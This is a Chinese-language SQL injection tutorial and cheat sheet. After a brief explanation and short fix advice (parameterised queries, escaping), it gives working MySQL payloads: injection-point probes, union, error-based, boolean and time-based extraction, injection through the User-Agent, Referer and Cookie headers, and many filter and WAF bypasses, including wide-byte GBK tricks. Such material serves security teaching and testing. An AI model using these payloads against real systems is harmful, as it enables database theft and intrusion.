SQL註入漏洞總結
目錄:
一、SQL註入漏洞介紹
二、修復建議
三、通用姿勢
四、具體實例
五、各種繞過
一、SQL註入漏洞介紹:
SQL註入攻擊包括通過輸入數據從客戶端插入或“註入”SQL查詢到應用程序。一個成功的SQL註入攻擊可以從數據庫中獲取敏感數據、修改數據庫數據(插入/更新/刪除)、執行數據庫管理操作(如關閉數據庫管理系統)、恢復存在於數據庫文件系統中的指定文件內容,在某些情況下能對操作系統發布命令。SQL註入攻擊是一種註入攻擊。它將SQL命令註入到數據層輸入,從而影響執行預定義的SQL命令。由於用戶的輸入,也是SQL語句的一部分,所以攻擊者可以利用這部分可以控制的內容,註入自己定義的語句,改變SQL語句執行邏輯,讓數據庫執行任意自己需要的指令。通過控制部分SQL語句,攻擊者可以查詢數據庫中任何自己需要的數據,利用數據庫的一些特性,可以直接獲取數據庫服務器的系統權限。
二、修復建議
- 使用參數化查詢接口或在代碼級對帶入SQL語句中的外部參數進行轉義或過濾;
- 對於整數,判斷變量是否符合[0-9]的值;其他限定值,也可以進行合法性校驗;
- 對於字符串,對SQL語句特殊字符進行轉義(單引號轉成兩個單引號,雙引號轉成兩個雙引號)。
三、通用姿勢
3.1 通過以下操作先大概判斷是否存在註入點
- 如果參數(id)是數字,測試id=2-1與id=1返回的結果是否相同,如果做了2-1=1的運算,說明可能存在數字型註入。如果要用+號運算的話,因為URL編碼的問題,需要把加好換成%2B,如id=1%2B1
- 在參數後面加單引號或雙引號,判斷返回結果是否有報錯
- 添加註釋符,判斷前後是否有報錯,如id=1‘ --+ 或 id=1" --+ 或id=1‘ # 或id=1" --+ (--後面跟+號,是把+當成空格使用)
- 有些參數可能在括號裏面,如:SELECT first_name, last_name FROM users WHERE user_id = (‘$id‘);所以也可以在參數後面加單雙引號和括號,如id=1‘) --+ 或 id=1") --+ 或id=1‘) # 或id=1") --+
- 參數後面跟or 或者and,判斷返回結果是否有變化,如1‘ or ‘a‘=‘a 或者and ‘a‘=‘a或者1‘ or ‘a‘=‘b或者1‘ or ‘1‘=‘2
- 如果返回的正確頁面與錯誤頁面都一樣,可以考慮時間延遲的方法判斷是否存在註入,如 1’ and sleep(5)
3.2 如果存在註入,利用註入獲取信息
3.2.1 查詢結果如果可以直接返回
利用聯合查詢一步步的獲取信息,如:
//獲取數據庫名稱,註意聯合查詢要求前後查詢的列數和數據類型必須對應
1‘ union select schema_name from information_schema.schemata -- //根據上一步獲取的數據庫名稱,獲取表名
1‘ union select table_name from information_schema.tables where table_schema=‘database_name‘ //根據上面的數據庫名稱和表名獲取字段名
1‘ union select column_name from information_schema.columns where table_schema=‘database_name‘ and table_name=‘table_name‘ //獲取字段值,使用group_concat的目的是把查詢結果合並成1列,另外,如果跨數據庫查詢值得花,需要使用數據庫名.表明的格式,比如
information_schema.schemata<br>1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from 數據庫名.表名
3.2.2 通過報錯回顯查詢結果,如:
#利用報錯回顯查詢到的值,回顯當前的數據庫名
and extractvalue(1,concat(0x7e,(select database()))) #回顯表名
and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security‘ )))
#回顯列名
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘)))
3.2.3 布爾型註入,如:
#判斷數據庫名的長度是多少 SELECT * FROM users where id =‘1‘ and LENGTH(database())=8 # 二分查找發挨個判斷數據庫名稱的每個字母 SELECT * FROM users where id =‘1‘ and ascii(substr((select database()),1,1))>115 #挨個判斷此數據庫中表的每個字母 SELECT * FROM users where id =‘1‘ and ascii(substr((select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1),1,1))>116
3.2.4 時間延遲註入,如:
and IF(ascii(substr((select database()),1,1))>115,1,sleep(5))
四、具體實例
4.1字符型(參數在單引號內,直接返回結果)
‘ ‘‘ " ""
‘"
"‘ ‘) ‘‘)
各種組合
4.2 數字型(直接返回結果)
無需引號閉合,id後面直接跟聯合索引就行了
4.3 user-agent類型的註入
user-agent的值被原封返回了
需要借助源碼審計了,否則不容易猜到真實的sql語句。
如下源碼所示,SQL語句是三個字段的insert語句,然後$uagent被返回。
結合報錯註入構造payload
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0‘, extractvalue(1,concat(0x7e,(select database()))),‘1‘) #
4.4 Referer類型的註入
Referer: http://127.0.0.1/sql/Less-19/‘,extractvalue(1,concat(0x7e,(select database()))))#
4.5 Cookie類型的註入
輸入單引號報錯,確認屬於cookie類型的註入,而且報錯回顯了,利用報錯回顯數據
構造payload
Cookie: uname=admin‘ and extractvalue(1,concat(0x7e,(select database()))) #
五、各種繞過
5.1 繞過空格
其他空白符
%20 %09 %0a %0b %0c %0d %a0 %00
註釋符
/**/ /*!*/
select/**/schemm_name/**/from/**/information_schema.schemata;
浮點數
select * from users where id=8E0union select 1,2,3 select * from users where id=8.0 select 1,2,3
括號
在MySQL中,括號是用來包圍子查詢的。因此,任何可以計算出結果的語句,都可以用括號包圍起來。而括號的兩端,可以沒有多余的空格。例如:
select(user())from dual where(1=1)and(2=2)
這種過濾方法常常用於time based盲註,例如:
?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23
(from for屬於逗號繞過下面會有)
上面的方法既沒有逗號也沒有空格。猜解database()第一個字符ascii碼是否為109,若是則加載延時
5.2 繞過引號(使用十六進制)
會使用到引號的地方一般是在最後的where
子句中。如下面的一條sql語句,這條語句就是一個簡單的用來查選得到users表中所有字段的一條語句:
select column_name from information_schema.tables where table_name="users"
這個時候如果引號被過濾了,那麽上面的where
子句就無法使用了。那麽遇到這樣的問題就要使用十六進制來處理這個問題了。 users
的十六進制的字符串是7573657273
。那麽最後的sql語句就變為了:
select column_name from information_schema.tables where table_name=0x7573657273
5.3 繞過逗號(使用from或者offset)
在使用盲註的時候,需要使用到substr(),mid(),limit。這些子句方法都需要使用到逗號。對於substr()和mid()這兩個方法可以使用from to
的方式來解決
select substr(database() from 1 for 1); select mid(database() from 1 for 1);
使用join
union select 1,2 #等價於 union select * from (select 1)a join (select 2)b
使用like
select ascii(mid(user(),1,1))=80 #等價於 select user() like ‘r%‘
對於limit
可以使用offset
來繞過
select * from news limit 0,1 # 等價於 select * from news limit 1 offset 0
5.4 繞過比較符號"<>"(sqlmap盲註經常需要用到"<>",使用greatest()/least函數,或者between的腳本)
使用greatest() / least():(前者返回最大值,後者返回最小值)
select * from users where id=1 and ascii(substr(database(),0,1))>64 #等價於
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
使用between and
between a and b:返回a,b之間的數據,不包含b
5.5 繞過 or and xor not
and=&& or=|| xor=| not=!
5.6 繞過註釋符號(#,--(後面跟一個空格))
id=1‘ union select 1,2,3||‘1
最後的or ‘1閉合查詢語句的最後的單引號,或者
id=1‘ union select 1,2,‘3
5.7 繞過等號"="
使用like 、rlike 、regexp 或者 使用< 或者 >
5.8 繞過union,select,where等
註釋符
常用註釋符
//,-- , /**/, #, --+, -- -, ;,%00,--a
用法
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user
大小寫
內聯註釋
id=-1‘/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#
雙關鍵字
id=-1‘UNIunionONSeLselectECT1,2,3–-
通用繞過(編碼)
如URLEncode編碼,ASCII,HEX,unicode編碼繞過
or 1=1 即
%6f%72%20%31%3d%31
而"Test"也可以為CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
等價函數
hex()、bin() ==> ascii() sleep() ==> benchmark() concat_ws() ==> group_concat() mid()、substr() ==> substring() @@user ==> user() @@datadir ==> datadir() 舉例:substring()和substr()無法使用時:?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74 或者: substr((select ‘password‘),1,1) = 0x70 strcmp(left(‘password‘,1), 0x69) = 1 strcmp(left(‘password‘,1), 0x70) = 0 strcmp(left(‘password‘,1), 0x71) = -1
5.9 繞過寬字節
過濾 ‘ 的時候往往利用的思路是將 ‘ 轉換為 \‘ 。
在 mysql 中使用 GBK 編碼的時候,會認為兩個字符為一個漢字,一般有兩種思路:
(1)%df 吃掉 \ 具體的方法是 urlencode(‘\) = %5c%27,我們在 %5c%27 前面添加 %df ,形成 %df%5c%27 ,而 mysql 在 GBK 編碼方式的時候會將兩個字節當做一個漢字,%df%5c 就是一個漢字,%27 作為一個單獨的(‘)符號在外面
id=-1%df%27union select 1,user(),3--+
(2)將 \‘ 中的 \ 過濾掉,例如可以構造 %**%5c%5c%27 ,後面的 %5c 會被前面的 %5c 註釋掉。
一般產生寬字節註入的PHP函數
1.replace():過濾 ‘ \ ,將 ‘ 轉化為 \‘ ,將 \ 轉為 \\,將 " 轉為 \" 。用思路一。 2.addslaches():返回在預定義字符之前添加反斜杠(\)的字符串。預定義字符:‘ , " , \ 。用思路一
(防禦??將mysql_query 設置為 binary 的方式) 3.mysql_real_escape_string():轉義下列字符:
\x00 \n \r \ ‘ " \x1a
(防禦??將mysql設置為gbk即可)
SQL註入漏洞總結